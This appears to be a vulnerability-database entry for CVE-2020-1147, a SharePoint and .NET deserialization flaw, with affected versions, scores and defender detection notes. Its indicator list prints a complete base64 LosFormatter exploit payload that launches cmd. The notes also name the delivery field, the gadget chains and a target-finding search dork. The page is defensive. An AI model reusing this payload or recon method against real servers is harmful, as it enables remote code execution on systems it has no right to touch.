cbcvebase.
CVE-2020-1147
published 2020-07-14

CVE-2020-1147: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of…

PriorityP186high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
94.24%
99.8th percentile
A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.

Affected

138 ranges· showing 25
VendorProductVersion rangeFixed in
microsoftmicrosoft.netcore.app.runtime.linux-arm>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.linux-arm64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.linux-musl-arm64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.linux-musl-x64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.linux-x64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.osx-x64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.win-arm>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.win-arm64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.win-x64>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft.netcore.app.runtime.win-x86>= 3.1.0 < 3.1.63.1.6
microsoftmicrosoft_net_framework_2.0
microsoftmicrosoft_net_framework_2.0
microsoftmicrosoft_net_framework_3.0
microsoftmicrosoft_net_framework_3.0
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5
microsoftmicrosoft_net_framework_3.5.1
microsoftmicrosoft_net_framework_3.5.1
microsoftmicrosoft_net_framework_3.5.1
microsoftmicrosoft_net_framework_3.5_and_4.6.2_4.7_4.7.1_4.7.2_on_windows_10_version_1607
microsoftmicrosoft_net_framework_3.5_and_4.6.2_4.7_4.7.1_4.7.2_on_windows_server_2016

Detection & IOCsextracted from sources · hover to see the quote

path/_layouts/15/quicklinks.aspx
path/_layouts/15/quicklinksdialogform.aspx
other/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==
other__SUGGESTIONSCACHE__
  • Monitor POST requests to /_layouts/15/quicklinks.aspx or /_layouts/15/quicklinksdialogform.aspx with a ?Mode=Suggestion query parameter and a populated __SUGGESTIONSCACHE__ form field, which is the exploit delivery mechanism for CVE-2020-1147.
  • The exploit targets the ContactLinksSuggestionsMicroView type (or derivatives) via the __SUGGESTIONSCACHE__ parameter; alert on POST requests to SharePoint quicklinks endpoints containing serialized LosFormatter payloads (base64-encoded, starting with /wEy) in that field.
  • Detect use of ysoserial.exe gadget chains TypeConfuseDelegate or TextFormattingRunProperties with LosFormatter output format, as these are the documented gadget generators for this exploit.
  • Google dork 'inurl:quicklinks.aspx' is used by attackers to identify vulnerable SharePoint targets; monitor for external reconnaissance against this path.
  • ·The exploit requires authenticated access (Domain User is sufficient in default SharePoint configurations); a Domain User account is enough to trigger the vulnerability without elevated privileges.
  • ·The exploit uses NTLM authentication; environments using non-NTLM auth may behave differently, but the deserialization sink itself is the core risk regardless of auth method.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc7.8CRITICAL
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.